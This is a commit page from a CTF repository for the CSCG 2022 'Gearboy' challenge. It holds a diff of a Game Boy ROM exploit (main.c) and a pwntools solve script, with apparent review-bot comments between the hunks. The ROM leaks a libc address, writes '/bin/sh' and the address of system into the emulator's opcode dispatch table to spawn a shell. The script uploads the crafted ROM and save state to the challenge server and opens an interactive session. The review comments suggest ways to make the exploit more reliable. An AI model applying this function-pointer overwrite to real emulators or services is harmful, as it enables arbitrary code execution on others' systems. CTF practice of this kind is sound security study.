cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy

commit a1f7b8843f887d2d698477d6d8544e545a517725
parent 3464878abafda13241f2eaed3db8bfd696ee4b67
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 26 May 2022 19:06:59 +0200

Working local using unstable offsets

Diffstat:
Mmain.c | 26+++++++++++++++-----------
Msolve.py | 40+++++++++-------------------------------
2 files changed, 24 insertions(+), 42 deletions(-)

diff --git a/main.c b/main.c
@@ -5,29 +5,33 @@ void main(void)
 {
 	volatile static uint8_t *processor;
+	volatile static uint8_t *memory;
 	volatile static uint64_t op0x00;
 	volatile static uint64_t base;
-	volatile static uint64_t load_rom;
+	volatile static uint64_t libc;
+	volatile static uint64_t leak;
+	volatile static uint64_t target;
+
+	/* NEEDS TO BE FIRST SESSION OF CONTAINER! */
 	/* processor - wrambanks = -0x126a0 */
 	/* WRAM BANK = -0x13 */
 	processor = (void*) 0xD960;
+	memory = processor - 0xd0;
-	/* leak opcode 0x00 to get base */
-	op0x00 = *(uint64_t*)processor;
-	base = op0x00 - 0x1d420;
-	load_rom = base + 0x34ad0;
-
-	/* set opcode 0x10 to load_rom */
-	*(uint64_t*)(processor+0x10*0x10) = load_rom;
+	/* leak libc from addr */
+	leak = *(uint64_t*)(memory + 0x30);
+	libc = leak + 0x125cff0;
+	target = libc + 0x52290; /* system */
-	/* write /bin/sh to processor pointer (opcode 0x00) */
-	strcpy(processor, "/home/ctf/wrapper.py");
+	/* set opcode 0x00 (nop) to gadget */
+	strcpy(processor, "/bin/sh");
+	*(uint64_t*)(processor+0x10*0x10) = target;
+	// *(uint64_t*)(processor+0x10*0x10) = 0;
 	__asm \
 		stop \
-		halt \
 	__endasm;
 	while (1);
diff --git a/solve.py b/solve.py
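Review bot: `leak = *(uint64_t*)(memory + 0x30)` is turned straight into the `system` pointer that is then written over the opcode-0x10 slot at `*(uint64_t*)(processor+0x10*0x10) = target`, with nothing checking that the leaked value is the pointer the hard-coded `0x125cff0` offset assumes — the commit message calls the offsets unstable and the `NEEDS TO BE FIRST SESSION OF CONTAINER!` comment says the leak only holds for one heap layout, so a mismatch plants a garbage function pointer in the emulator's dispatch table and burns the session. If the leak's target is a page-aligned libc base, the offset fixes the low bits of the leak (0x1000 - (0x125cff0 & 0xfff) = 0x010), so a cheap guard before the write is `if ((leak & 0xfff) != 0x010) while (1);`, which spins instead of corrupting the table when the layout is wrong. The comment `/* set opcode 0x00 (nop) to gadget */` no longer matches the lines under it — the string lands in the opcode-0x00 slot and the gadget in the opcode-0x10 slot — so something like `/* "/bin/sh" into opcode slot 0x00 (argument), system into opcode slot 0x10 (run by the stop below) */` would be accurate; `op0x00` and `base` are now unused declarations and the `// *(uint64_t*)(...) = 0;` line is dead code. `main`'s signature is outside the hunk.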
@@ -6,37 +6,15 @@ from pwn import *
 context.log_level = "error"
-def send(rom, state):
-	#io = process("ncat --ssl 8c83260abb62e95abcc3fdf7-gearboy.challenge.master.cscg.live 31337".split())
-	io = process("ncat localhost 1024".split())
-	io.sendline(b64encode(open(rom, "rb").read()))
-	io.sendline(b64encode(open(state, "rb").read()))
-	data = io.readuntil(b"Got EOF")
-	io.close()
-	return data
+rom = list(open("main.gb", "rb").read())
+state = list(open("main.state", "rb").read())
-def set_wrambanks(filename, index):
-	data = open(filename, "rb").read()
-	data = data[:0x1000] + struct.pack("<i", index) + data[0x1004:]
-	with open(filename, "wb+") as f:
-		f.write(data)
+for i,v in enumerate(struct.pack("<i", -0x13)):
+	state[0x10000+i] = v
-def find_heap_start():
-	search_space = (-256, -90)
-	while search_space[0] + 1 != search_space[1]:
-		testval = (search_space[1] + search_space[0]) // 2
-		print(search_space)
+io = process("ncat --ssl 61a837693e76115bbb874401-gearboy.challenge.master.cscg.live 31337".split())
+#io = process("ncat localhost 1024".split())
+io.sendline(b64encode(bytes(rom)))
+io.sendline(b64encode(bytes(state)))
-		set_modstate(testval)
-
-		data = send("main.gb", "main.state")
-		if b"exit code 139" in data:
-			search_space = (testval, search_space[1])
-		else:
-			search_space = (search_space[0], testval)
-
-	print("OFFSET", testval)
-
-set_wrambanks("main.gb", -0x37)
-
-print(send("main.gb", "main.state").decode())
+io.interactive()
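Review bot: The four-byte WRAM-bank patch at `state[0x10000+i] = v` copies the whole save state into a Python `list` and loops, with both `open()` handles left unclosed; a `bytearray` takes slice assignment, so `state = bytearray(open("main.state", "rb").read())` followed by `state[0x10000:0x10004] = struct.pack("<i", -0x13)` replaces the loop (add a length check first, since slice assignment past the end silently appends where the loop would raise IndexError), and `rom` is never modified so it can stay the `bytes` the read returns, dropping both `bytes(...)` round trips in the `sendline` calls. The magic value deserves a comment tying it to the C side, e.g. `# WRAM bank index -0x13 — must match the "WRAM BANK" value main.c assumes`. Separately, `ncat --ssl` on its own does not verify the server certificate (that needs `--ssl-verify`), so the payload and the resulting shell session are exposed to anyone between the script and the challenge host; fine for a throwaway CTF instance, but worth a one-line comment so the pattern is not copied elsewhere.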